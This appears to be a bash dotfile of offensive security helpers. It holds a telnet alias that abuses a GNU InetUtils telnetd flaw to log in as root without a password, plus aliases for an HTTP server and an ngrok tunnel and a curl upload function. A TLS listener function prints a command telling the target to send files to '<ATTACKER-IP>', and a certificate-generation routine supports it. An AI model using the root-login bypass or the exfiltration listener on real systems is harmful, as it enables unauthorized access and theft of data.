#!/usr/bin/env bash

# VM_SEC_LISTS_SECLISTS="$HOME/opt/sec/SecLists"
# VM_SEC_LISTS_PAYLOADS="$HOME/opt/sec/PayloadsAllTheThings"
# VM_SEC_LISTS_SECFILES="$HOME/opt/sec/SecFiles"
# VM_SEC_LISTS_TEMPLATES="$HOME/opt/sec/Templates"
# VM_SEC_NUCLEI_TEMPLATES="$HOME/.dotfiles/sec/nuclei"

VM_SEC_USER_AGENT=${VM_SEC_USER_AGENT:-'Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:147.0) Gecko/20100101 Firefox/147.0'}

######################################################################
##
## DEFAULTS:: Snippets
##
######################################################################
alias vm_sec_csv_telnet='USER="-f root" telnet -a' # GNU InetUtils 1.9.3

######################################################################
##
## FUNCTIONS:: server/reverse
##
######################################################################
alias vm_sec_server='python3 -m http.server 4445'
alias vm_sec_tunnel='ngrok http 4445'

vm_sec_curl_up() {
  if [ "$#" -lt 2 ]; then
    echo "Usage: $0 <FILE> <URL>"
    return 1
  fi

  curl -F file=@"$1" "$2"
}

vm_sec_server_ssl() {
  if [ "$#" -lt 1 ]; then
    echo "Usage: $0 <FILE-TO-SAVE> [KEY-PEM] [CERT-PEM] [PORT]"
    return 1
  fi

  local file="$1"
  local priv="${2:-}"
  local cert="${3:-}"
  local port="${4:-8443}"

  if [[ -z "$priv" && -z "$cert" ]]; then
    vm_sec_create_cert
    priv="key.pem"
    cert="cert.pem"
  fi

  if [[ ! -f "$priv" || ! -f "$cert" ]]; then
    echo "Error: Key or cert file does not exist."
    return 1
  fi

  echo
  echo "Run the following on target side to send file to open listening server:"
  echo "  openssl s_client -quiet -no-CAfile -no-CApath -connect <ATTACKER-IP>:$port < <FILE-TO-UPLOAD>"

  echo
  echo "SSL-Server started and waiting for uploads saving into '$file'..."
  openssl s_server -quiet -ignore_unexpected_eof -tls1_3 -key "$priv" -cert "$cert" -port "$port" > "$file"
}


######################################################################
##
## FUNCTIONS:: certs
##
######################################################################
vm_sec_create_cert() {
  local name="${1:-iwashere}"
  local cert_path="${2:-.}"
  local ca_key="$cert_path/ca.key"
  local ca_crt="$cert_path/ca.crt"
  local key="$cert_path/key.pem"
  local csr="$cert_path/csr.pem"
  local cert="$cert_path/cert.pem"
  local san="subjectAltName=IP:127.0.0.1,DNS:localhost,DNS:*.$name"

  local file
  for file in "$ca_key" "$ca_crt" "$key" "$csr" "$cert"; do
    [[ -f "$file" ]] && { echo "File '$file' exists. Cancel cert creation"; return 1; }
  done

  echo "Creating CA..."
  openssl ecparam -name prime256v1 -genkey -out "$ca_key"
  openssl req -new -x509 -sha256 -days 6669 -key "$ca_key" -out "$ca_crt" \
    -subj "/O=$name/CN=$name" \
    -extensions v3_ca \
    -config <(
      echo "[req]"
      echo "distinguished_name=req"
      echo "x509_extensions=v3_ca"
      echo "[req]"
      echo "[v3_ca]"
      echo "basicConstraints = critical, CA:true"
      echo "keyUsage = critical, keyCertSign, cRLSign"
      echo "subjectKeyIdentifier = hash"
    )
  chmod 600 "$ca_key"

  echo "Creating server cert..."
  openssl ecparam -name prime256v1 -genkey -out "$key"
  openssl req -new -sha256 -key "$key" -out "$csr" \
    -subj "/O=$name/CN=*.$name" \
    -config <(
      : 'cat /etc/ssl/openssl.cnf ; \'
      echo '[req]'
      echo 'distinguished_name=req'
      echo 'req_extensions=v3_req'
      echo 'x509_extensions=v3_req'
      echo "[v3_req]"
      echo "keyUsage = critical, digitalSignature"
      echo "extendedKeyUsage = serverAuth"
      echo "${san}"
    )
  openssl x509 -req -in "$csr" -CA "$ca_crt" -CAkey "$ca_key" -CAcreateserial \
    -sha256 -days 666 -out "$cert" \
    -extensions v3_req \
    -extfile <(
      : 'cat /etc/ssl/openssl.cnf ; \'
      echo '[req]'
      echo 'distinguished_name=req'
      echo 'req_extensions=v3_req'
      echo 'x509_extensions=v3_req'
      echo "[v3_req]"
      echo "keyUsage = critical, digitalSignature"
      echo "extendedKeyUsage = serverAuth"
      echo "${san}"
    )

  echo "Certificates created successfully!"
}
